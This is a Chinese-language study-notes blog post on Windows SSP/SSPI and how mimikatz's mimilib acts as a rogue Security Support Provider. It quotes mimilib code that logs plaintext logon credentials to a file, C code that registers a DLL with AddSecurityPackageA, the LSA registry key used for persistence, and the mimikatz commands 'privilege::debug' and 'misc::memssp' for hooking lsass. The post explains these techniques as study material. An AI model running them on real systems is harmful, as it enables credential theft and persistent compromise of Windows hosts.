<!DOCTYPE html><html lang="en" mode="light" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="pv-cache-enabled" content="false"><meta name="generator" content="Jekyll v4.2.0" /><meta property="og:title" content="SSP与mimilib" /><meta name="author" content="RingLcy" /><meta property="og:locale" content="en_US" /><meta name="description" content="学习了以下文章，整理SSP相关笔记:" /><meta property="og:description" content="学习了以下文章，整理SSP相关笔记:" /><link rel="canonical" href="https://ringlcy.github.io/posts/SSP%E4%B8%8Emimilib/" /><meta property="og:url" content="https://ringlcy.github.io/posts/SSP%E4%B8%8Emimilib/" /><meta property="og:site_name" content="我的学习笔记" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-12-31T23:59:47+08:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="SSP与mimilib" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"RingLcy"},"description":"学习了以下文章，整理SSP相关笔记:","url":"https://ringlcy.github.io/posts/SSP%E4%B8%8Emimilib/","@type":"BlogPosting","headline":"SSP与mimilib","dateModified":"2020-12-31T23:59:47+08:00","datePublished":"2020-12-31T23:59:47+08:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://ringlcy.github.io/posts/SSP%E4%B8%8Emimilib/"},"@context":"https://schema.org"}</script><title>SSP与mimilib | 我的学习笔记</title><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script defer src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id="></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', ''); }); </script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="/assets/img/favicons/ms-icon-144x144.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">我的学习笔记</a></div><div class="site-subtitle font-italic">种一棵树最好的时间是五年前，其次是现在</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/tabs/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tabs/tags/" class="nav-link"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/tabs/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/tabs/about/" class="nav-link"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center"> <a href="https://github.com/RingLcy" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['',''].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>SSP与mimilib</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>SSP与mimilib</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Thu, Dec 31, 2020, 11:59 PM +0800" > Dec 31, 2020 <i class="unloaded">2020-12-31T23:59:47+08:00</i> </span> by <span class="author"> RingLcy </span></div><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1014 words">5 min</span></div></div><div class="post-content"><p>学习了以下文章，整理SSP相关笔记:</p><p><a href="https://3gstudent.github.io/3gstudent.github.io/Mimikatz%E4%B8%ADSSP%E7%9A%84%E4%BD%BF%E7%94%A8/">Mimikatz中SSP的使用</a></p><p><a href="https://www.anquanke.com/post/id/180001#h2-1">深入分析Mimikatz：SSP</a></p><p><a href="https://blog.xpnsec.com/exploring-mimikatz-part-2/">Exploring Mimikatz - Part 2 - SSP</a></p><h2 id="sspissp">SSPI&amp;SSP</h2><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/1963614-20200422220757960-542959289.png" alt="img" /></p><ul><li>SSPI(Security Support Provider Interface)</ul><p>这是 Windows 定义的一套接口，此接口定义了与安全有关的功能函数， 用来获得验证、信息完整性、信息隐私等安全功能，就是定义了一套接口函数用来身份验证，签名等，但是没有具体的实现。</p><ul><li>SSP(Security Support Provider)</ul><p>SSPI 的实现者，对SSPI相关功能函数的具体实现。微软自己实现了如下的 SSP，用于提供安全功能：</p><ol><li>NTLM SSP: msv1_0.dll<li>Kerberos: kerberos.dll<li>Cred SSP<li>Digest SSP<li>Negotiate SSP<li>Schannel SSP<li>Negotiate Extensions SSP<li>PKU2U SSP</ol><p>在系统层面，SSP就是一个dll，来实现身份验证等安全功能，实现的身份验证机制是不一样的。比如 NTLM SSP 实现的就是一种 Challenge/Response 验证机制。而 Kerberos 实现的就是基于 ticket 的身份验证机制。我们可以编写自己的 SSP，然后注册到操作系统中，让操作系统支持更多的自定义的身份验证方法。</p><h2 id="ssp的实现-mimilib">SSP的实现-mimilib</h2><p>mimikatz中的<a href="https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/mimilib.def">mimilib</a>可以作为一个SSP来使用，mimilib通过模块定义文件.def声明了一堆导出函数，其中就有<code class="language-plaintext highlighter-rouge">SpLsaModeInitialize</code>。</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>SpLsaModeInitialize		=	kssp_SpLsaModeInitialize
</pre></table></code></div></div><p><code class="language-plaintext highlighter-rouge">SpLsaModeInitialize</code>是SSP的初始化函数，由LSA加载自己时调用。<code class="language-plaintext highlighter-rouge">SpLsaModeInitialize</code>的主要功能是给参数<em>ppTables</em>赋值，用于告诉LSA各个回调函数的地址；<em>ppTables</em> 指向<a href="https://docs.microsoft.com/en-us/windows/win32/api/ntsecpkg/ns-ntsecpkg-secpkg_function_table">SECPKG_FUNCTION_TABLE</a>结构体，LSA需要SSP实现的函数指针都包含在此结构体内。</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/image-20201018135645727.png" alt="image-20201018135645727" /></p><p>mimilib SSP就实现了<code class="language-plaintext highlighter-rouge">SpLsaModeInitialize</code>及以下4个回调函数，相关实现都在<a href="https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kssp.c">kssp.c</a></p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>SpInitialize：用来初始化SSP，提供一个函数指针列表。
SpShutDown：卸载SSP时就会被调用，以便释放资源。
SpGetInfoFn：提供SSP相关信息，包括版本、名称以及描述。
SpAcceptCredentials：接收LSA传递的明文凭据，以便SSP缓存。
</pre></table></code></div></div><p>可以看到 kssp_SpAcceptCredentials 内部实现就是将获取到的明文凭据写到kiwissp.log中，认证结果直接访问Success。</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>NTSTATUS NTAPI kssp_SpAcceptCredentials(SECURITY_LOGON_TYPE LogonType, PUNICODE_STRING AccountName, PSECPKG_PRIMARY_CRED PrimaryCredentials, PSECPKG_SUPPLEMENTAL_CRED SupplementalCredentials)
{
	FILE *kssp_logfile;
#pragma warning(push)
#pragma warning(disable:4996)
	if(kssp_logfile = _wfopen(L"kiwissp.log", L"a"))
#pragma warning(pop)
	{	
		klog(kssp_logfile, L"[%08x:%08x] [%08x] %wZ\\%wZ (%wZ)\t", PrimaryCredentials-&gt;LogonId.HighPart, PrimaryCredentials-&gt;LogonId.LowPart, LogonType, &amp;PrimaryCredentials-&gt;DomainName, &amp;PrimaryCredentials-&gt;DownlevelName, AccountName);
		klog_password(kssp_logfile, &amp;PrimaryCredentials-&gt;Password);
		klog(kssp_logfile, L"\n");
		fclose(kssp_logfile);
	}
	return STATUS_SUCCESS;
}
</pre></table></code></div></div><h2 id="操作ssp">操作SSP</h2><h3 id="遍历">遍历</h3><p><strong>EnumerateSecurityPackagesA</strong></p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre>#define SECURITY_WIN32

#include &lt;stdio.h&gt;
#include &lt;Windows.h&gt;
#include &lt;Security.h&gt;
#pragma comment(lib,"Secur32.lib")

int main(int argc, char **argv) {
	ULONG packageCount = 0;
	PSecPkgInfoA packages;

	if (EnumerateSecurityPackagesA(&amp;packageCount, &amp;packages) == SEC_E_OK) {
		for (int i = 0; i &lt; packageCount; i++) {
			printf("Name: %s\nComment: %s\n\n", packages[i].Name, packages[i].Comment);
		}
	}
}
</pre></table></code></div></div><h3 id="注册">注册</h3><p>方法1: 添加注册表后重启生效</p><p>在<code class="language-plaintext highlighter-rouge">HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages</code>中加入<code class="language-plaintext highlighter-rouge">mimilib.dll</code>的路径</p><p>不需要将mimilib.dll拷贝到system32目录下，路径中不包含空格就可以</p><p>方法2: 调用AddSecurityPackage</p><p>这种方法立即能生效，但为了驻留还是需要添加上述注册表，以防重启后失效。Empire中的Install-SSP.ps1就实现了这一过程。</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre>#define SECURITY_WIN32

#include &lt;stdio.h&gt;
#include &lt;Windows.h&gt;
#include &lt;Security.h&gt;
#pragma comment(lib,"Secur32.lib")


int main(int argc, char **argv) {
	SECURITY_PACKAGE_OPTIONS option;
	option.Size = sizeof(option);
	option.Flags = 0;
	option.Type = SECPKG_OPTIONS_TYPE_LSA;
	option.SignatureSize = 0;
	option.Signature = NULL;
	SECURITY_STATUS SEC_ENTRYnRet = AddSecurityPackageA(argv[1], &amp;option);
	printf("AddSecurityPackage return with 0x%X\n", SEC_ENTRYnRet);
}
</pre></table></code></div></div><p>注: <code class="language-plaintext highlighter-rouge">DeleteSecurityPackageA</code>删除SSP不起作用，可用3gStudent的<a href="https://github.com/3gstudent/Homework-of-C-Language/blob/master/FreeDll.cpp">FreeDll</a>卸载mimilib.dll</p><p>方法3: RPC通知lsass加载SSP</p><p>没太看懂，POC没编译成功，大概原理是AddSecurityPackage的内部实现也是通过RPC调用，所以XPN使用了这个方法</p><h2 id="miscmemssp">misc::memssp</h2><p>这种方法也可以dump 明文凭据，原理是hook msv1_0.dll<code class="language-plaintext highlighter-rouge">的</code>SpAcceptCredentials函数，将凭据写入mimilsa.log中。</p><p>这种方式下，hook代码通过WriteProcessMemory被拷贝到<code class="language-plaintext highlighter-rouge">lsass</code>中，对lsass进程做写操作容易被检测到；相比添加SSP的方法，不需要dll落地，不需要添加注册表；</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>privilege::debug
misc::memssp
</pre></table></code></div></div></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/%E5%9F%9F%E5%AE%89%E5%85%A8/'>域安全</a>, <a href='/categories/ta0006%E5%87%AD%E6%8D%AE%E8%AE%BF%E9%97%AE/'>TA0006凭据访问</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/mimikatz/" class="post-tag no-text-decoration" >mimikatz</a> <a href="/tags/ssp/" class="post-tag no-text-decoration" >ssp</a> <a href="/tags/ta0006%E5%87%AD%E6%8D%AE%E8%AE%BF%E9%97%AE/" class="post-tag no-text-decoration" >TA0006凭据访问</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=SSP与mimilib - 我的学习笔记&url=https://ringlcy.github.io/posts/SSP%E4%B8%8Emimilib/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=SSP与mimilib - 我的学习笔记&u=https://ringlcy.github.io/posts/SSP%E4%B8%8Emimilib/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=SSP与mimilib - 我的学习笔记&url=https://ringlcy.github.io/posts/SSP%E4%B8%8Emimilib/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/ta0006%E5%87%AD%E6%8D%AE%E8%AE%BF%E9%97%AE/">TA0006凭据访问</a> <a class="post-tag" href="/tags/ta0003%E6%8C%81%E4%B9%85%E5%8C%96/">TA0003持久化</a> <a class="post-tag" href="/tags/mimikatz/">mimikatz</a> <a class="post-tag" href="/tags/ta0004%E6%9D%83%E9%99%90%E5%8D%87%E7%BA%A7/">TA0004权限升级</a> <a class="post-tag" href="/tags/ta0008%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/">TA0008横向移动</a> <a class="post-tag" href="/tags/activedirectory/">ActiveDirectory</a> <a class="post-tag" href="/tags/adminsdholder/">AdminSDHolder</a> <a class="post-tag" href="/tags/as-rep-roasting/">AS-REP Roasting</a> <a class="post-tag" href="/tags/dcshadow/">DCShadow</a> <a class="post-tag" href="/tags/dcsync/">dcsync</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Mimikatz%E4%B8%ADsekurlsa-wdigest%E5%8E%9F%E7%90%86/"><div class="card-body"> <span class="timeago small" > Dec 31, 2020 <i class="unloaded">2020-12-31T23:59:45+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Mimikatz sekurlsa::wdigest原理</h3><div class="text-muted small"><p> Mimikatz sekurlsa::wdigest原理 看了以下几篇文章，整理一下笔记: Mimikatz中sekurlsa::wdigest的实现 Exploring Mimikatz - Part 1 - WDigest 深入分析Mimikatz：WDigest 简介 wdigest.dll是LSASS中实现Digest Authentication的SSP，LSASS会将...</p></div></div></a></div><div class="card"> <a href="/posts/mimikatz%E4%B8%ADDPAPI%E5%8E%9F%E7%90%86%E4%B8%8E%E4%BD%BF%E7%94%A8/"><div class="card-body"> <span class="timeago small" > Dec 31, 2020 <i class="unloaded">2020-12-31T23:59:59+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>DPAPI</h3><div class="text-muted small"><p> 参考: How to hack a Windows password How to decrypt stored Windows passwords using mimikatz and DAPA 渗透技巧-离线导出Chrome浏览器中保存的密码 渗透技巧-利用Masterkey离线导出Chrome浏览器中保存的密码 Operational Guidance for Offensi...</p></div></div></a></div><div class="card"> <a href="/posts/Kerberoasting/"><div class="card-body"> <span class="timeago small" > Dec 31, 2020 <i class="unloaded">2020-12-31T23:59:56+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Kerberoasting</h3><div class="text-muted small"><p> Kerberoasting SPN(Service Principal Name) SPN，即Service Principal Name，客户端通过Kerberos请求使用某种服务时，会在请求中附带上需要访问的服务的SPN名称，如文件共享服务cifs/DNS_DOMAIN_NAME，目录访问服务ldap/DNS_DOMAIN_NAME。KDC（密钥分发中心）将通过SPN来确定客户端请求...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/Mimikatz%E4%B8%ADsekurlsa-wdigest%E5%8E%9F%E7%90%86/" class="btn btn-outline-primary" prompt="Older"><p>Mimikatz sekurlsa::wdigest原理</p></a> <a href="/posts/DCsync%E5%8E%9F%E7%90%86%E5%8F%8A%E5%88%A9%E7%94%A8/" class="btn btn-outline-primary" prompt="Newer"><p>DCsync原理及利用</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('.post-content img'); const observer = lozad(imgs); observer.observe(); </script><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2021 <a href=""></a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/ta0006%E5%87%AD%E6%8D%AE%E8%AE%BF%E9%97%AE/">TA0006凭据访问</a> <a class="post-tag" href="/tags/ta0003%E6%8C%81%E4%B9%85%E5%8C%96/">TA0003持久化</a> <a class="post-tag" href="/tags/mimikatz/">mimikatz</a> <a class="post-tag" href="/tags/ta0004%E6%9D%83%E9%99%90%E5%8D%87%E7%BA%A7/">TA0004权限升级</a> <a class="post-tag" href="/tags/ta0008%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/">TA0008横向移动</a> <a class="post-tag" href="/tags/activedirectory/">ActiveDirectory</a> <a class="post-tag" href="/tags/adminsdholder/">AdminSDHolder</a> <a class="post-tag" href="/tags/as-rep-roasting/">AS REP Roasting</a> <a class="post-tag" href="/tags/dcshadow/">DCShadow</a> <a class="post-tag" href="/tags/dcsync/">dcsync</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://ringlcy.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
